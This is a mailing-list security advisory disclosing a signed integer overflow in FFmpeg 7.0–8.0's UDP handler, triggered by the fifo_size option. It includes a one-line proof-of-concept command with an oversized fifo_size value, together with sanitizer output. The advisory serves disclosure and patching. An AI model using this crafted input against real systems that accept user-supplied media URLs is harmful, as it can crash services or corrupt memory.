
Full Disclosure mailing list archives
FFmpeg 7.0+ Integer Overflow in UDP Protocol Handler (fifo_size option)
From: Ron E <ronaldjedgerson () gmail com>
Date: Sun, 7 Sep 2025 02:43:02 -0400
A signed integer overflow exists in FFmpeg’s udp.c implementation when parsing the fifo_size option from a user-supplied UDP URL. The overflow occurs during multiplication, which is used to compute the size of the circular receive buffer. This can result in undefined behavior, allocation failures, or potentially memory corruption depending on compiler optimizations and downstream usage. (FFmpeg 7.0-8.0)) *Impact:* - Denial of Service (allocation failure, runtime crash). - Heap buffer overflow if the wrapped value allocates a smaller buffer than required but is later written into with the intended (larger) size. - Severity depends on compiler behavior and downstream allocations. *Proof of Concept:*./ffmpeg -i udp://127.0.0.1:1234?fifo_size=2147483647 -f null - *Output:*libavformat/udp.c:760:29: runtime error: signed integer overflow: 2147483647 * 188 cannot be represented in type 'int' SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior libavformat/udp.c:760:29 [in#0 @ 0x512000000040] Error opening input: Cannot allocate memory Error opening input file udp://127.0.0.1:1234?fifo_size=2147483647. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- FFmpeg 7.0+ Integer Overflow in UDP Protocol Handler (fifo_size option) Ron E (Sep 08)